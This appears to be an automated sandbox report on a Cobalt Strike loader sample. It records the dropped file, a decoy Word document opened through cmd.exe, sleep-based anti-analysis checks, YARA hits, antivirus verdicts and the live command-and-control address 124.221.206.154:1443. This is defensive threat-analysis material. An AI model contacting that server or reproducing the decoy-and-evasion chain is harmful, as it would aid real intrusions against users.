Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to behavior
Source: C:\Windows\Temp\????????????.exe TID: 2264Thread sleep time: -1800000s >= -30000sJump to behavior
Source: C:\Windows\Temp\????????????.exeLast function: Thread delayed
Source: C:\Windows\Temp\????????????.exeLast function: Thread delayed
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_013582C0 rdtscp3_2_013582C0
Source: C:\Windows\Temp\????????????.exeThread delayed: delay time: 60000Jump to behavior
Source: 1a#U77e5.exe, 00000000.00000002.441267582.0000027D4128C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMM]
Source: ????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.650269287.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.446429982.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.459728313.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.455168561.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.581376031.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

Anti Debugging

barindex
Potentially malicious time measurement code found
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_013582C0 Start: 013582C9 End: 013582DF3_2_013582C0
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_013582C0 rdtscp3_2_013582C0
Source: C:\Users\user\Desktop\1a#U77e5.exeProcess created: C:\Windows\Temp\????????????.exe C:\Windows\Temp\????????????.exe 9gb3vbgengJump to behavior
Source: C:\Users\user\Desktop\1a#U77e5.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start ?????????????????????.docxJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\?????????????????????.docx" /o "Jump to behavior
Source: C:\Windows\Temp\????????????.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8AC3B5C GetUserNameA,strrchr,_snprintf,3_2_0000025BF8AC3B5C

Remote Access Functionality

barindex
Yara detected CobaltStrike
Source: Yara matchFile source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ????????????.exe PID: 3016, type: MEMORYSTR

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1
DLL Side-Loading		11
Process Injection		11
Masquerading		OS Credential Dumping111
Security Software Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		11
Virtualization/Sandbox Evasion		LSASS Memory11
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Non-Standard Port		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager1
Account Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Deobfuscate/Decode Files or Information		NTDS1
System Owner/User Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Software Packing		Cached Domain Credentials3
System Information Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
DLL Side-Loading		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 679126 Sample: 1a#U77e5.exe Startdate: 05/08/2022 Architecture: WINDOWS Score: 100 26 Malicious sample detected (through community Yara rule) 2->26 28 Antivirus detection for URL or domain 2->28 30 Antivirus / Scanner detection for submitted sample 2->30 32 3 other signatures 2->32 7 1a#U77e5.exe 2 2->7         started        process3 file4 22 C:\Windows\Temp\????????????.exe, PE32+ 7->22 dropped 10 ????????????.exe 1 7->10         started        14 cmd.exe 5 2 7->14         started        process5 dnsIp6 24 124.221.206.154, 1443, 49755, 49763 JCN-AS-KRUlsanJung-AngBroadcastingNetworkKR China 10->24 34 Antivirus detection for dropped file 10->34 36 Multi AV Scanner detection for dropped file 10->36 38 Potentially malicious time measurement code found 10->38 16 conhost.exe 10->16         started        18 WINWORD.EXE 248 35 14->18         started        20 conhost.exe 14->20         started        signatures7 process8

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
1a#U77e5.exe61%VirustotalBrowse
1a#U77e5.exe23%MetadefenderBrowse
1a#U77e5.exe77%ReversingLabsWin64.Trojan.CobaltStrike
1a#U77e5.exe100%AviraTR/CobaltStrike.fyzok

Dropped Files

SourceDetectionScannerLabelLink
C:\Windows\Temp\????????????.exe100%AviraHEUR/AGEN.1211767
C:\Windows\Temp\????????????.exe26%MetadefenderBrowse
C:\Windows\Temp\????????????.exe62%ReversingLabsWin64.Downloader.Gobalt

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
3.2.????????????.exe.1300000.0.unpack100%AviraHEUR/AGEN.1211767Download File
0.0.1a#U77e5.exe.2a0000.0.unpack100%AviraHEUR/AGEN.1211854Download File
0.2.1a#U77e5.exe.2a0000.0.unpack100%AviraHEUR/AGEN.1211854Download File
3.0.????????????.exe.1300000.0.unpack100%AviraHEUR/AGEN.1211767Download File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://roaming.edog.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
https://124.221.206.154:1443/ubmit.phpn100%Avira URL Cloudmalware
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
https://124.221.206.154:1443/ubmit.php100%Avira URL Cloudmalware
https://124.221.206.154/n-US100%Avira URL Cloudmalware
https://my.microsoftpersonalcontent.com0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://124.221.206.154:1443/100%Avira URL Cloudmalware
https://api.aadrm.com0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://124.221.206.154/W100%Avira URL Cloudmalware
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://124.221.206.154:1443/submit.phpo100%Avira URL Cloudmalware
https://ncus.contentsync.0%URL Reputationsafe
https://124.221.206.154:1443/submit.phpw100%Avira URL Cloudmalware
https://124.221.206.154:1443/submit.phpy100%Avira URL Cloudmalware
https://124.221.206.154/-100%Avira URL Cloudmalware
https://124.221.206.154:1443/submit.phpx100%Avira URL Cloudmalware
https://apis.live.net/v5.0/0%URL Reputationsafe
124.221.206.154100%Avira URL Cloudmalware
https://124.221.206.154:1443/0;100%Avira URL Cloudmalware
https://124.221.206.154:1443/submit.phpI100%Avira URL Cloudmalware
https://wus2.contentsync.0%URL Reputationsafe
https://124.221.206.154:1443/submit.phpQ100%Avira URL Cloudmalware
https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
https://124.221.206.154:1443/submit.phpc100%Avira URL Cloudmalware
https://124.221.206.154:1443/submit.phpe100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
124.221.206.154true
  • Avira URL Cloud: malware
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
    		high
    https://login.microsoftonline.com/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
      		high
      https://shell.suite.office.com:1443E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
        		high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
          		high
          https://autodiscover-s.outlook.com/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
            		high
            https://roaming.edog.E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
            • URL Reputation: safe
            		unknown
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
              		high
              https://cdn.entity.E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
              • URL Reputation: safe
              		unknown
              https://api.addins.omex.office.net/appinfo/queryE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                		high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                  		high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                    		high
                    https://powerlift.acompli.netE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://lookup.onenote.com/lookup/geolocation/v1E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                      		high
                      https://cortana.aiE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                        		high
                        https://cloudfiles.onenote.com/upload.aspxE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                          		high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                            		high
                            https://entitlement.diagnosticssdf.office.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                              		high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                		high
                                https://api.aadrm.com/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                  		high
                                  https://124.221.206.154:1443/ubmit.phpn????????????.exe, 00000003.00000002.707570619.0000025BF3699000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://api.microsoftstream.com/api/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                    		high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                      		high
                                      https://cr.office.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                        		high
                                        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;hE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        https://portal.office.com/account/?ref=ClientMeControlE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                          		high
                                          https://graph.ppe.windows.netE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                            		high
                                            https://res.getmicrosoftkey.com/api/redemptioneventsE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://powerlift-frontdesk.acompli.netE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://tasks.office.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                              		high
                                              https://officeci.azurewebsites.net/api/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/workE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                		high
                                                https://124.221.206.154:1443/ubmit.php????????????.exe, 00000003.00000002.707570619.0000025BF3699000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://124.221.206.154/n-US????????????.exe, 00000003.00000003.446429982.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.459728313.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.455168561.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.450683931.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.463998398.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://my.microsoftpersonalcontent.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://store.office.cn/addinstemplateE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://124.221.206.154:1443/????????????.exe, 00000003.00000003.680436999.0000025BF36DA000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.450674237.0000025BF36D1000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.650269287.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.645708761.0000025BF36CD000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546244712.0000025BF36CD000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.472618349.0000025BF36D1000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.446429982.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.459728313.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.515410872.0000025BF36D1000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.455168561.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.581376031.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707824461.0000025BF36CD000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.555953821.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.507054004.0000025BF36D1000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565779330.0000025BF36CD000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://api.aadrm.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                  		high
                                                  https://globaldisco.crm.dynamics.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                    		high
                                                    https://messaging.engagement.office.com/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                      		high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                        		high
                                                        https://dev0-api.acompli.net/autodetectE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.odwebp.svc.msE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://api.diagnosticssdf.office.com/v2/feedbackE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                          		high
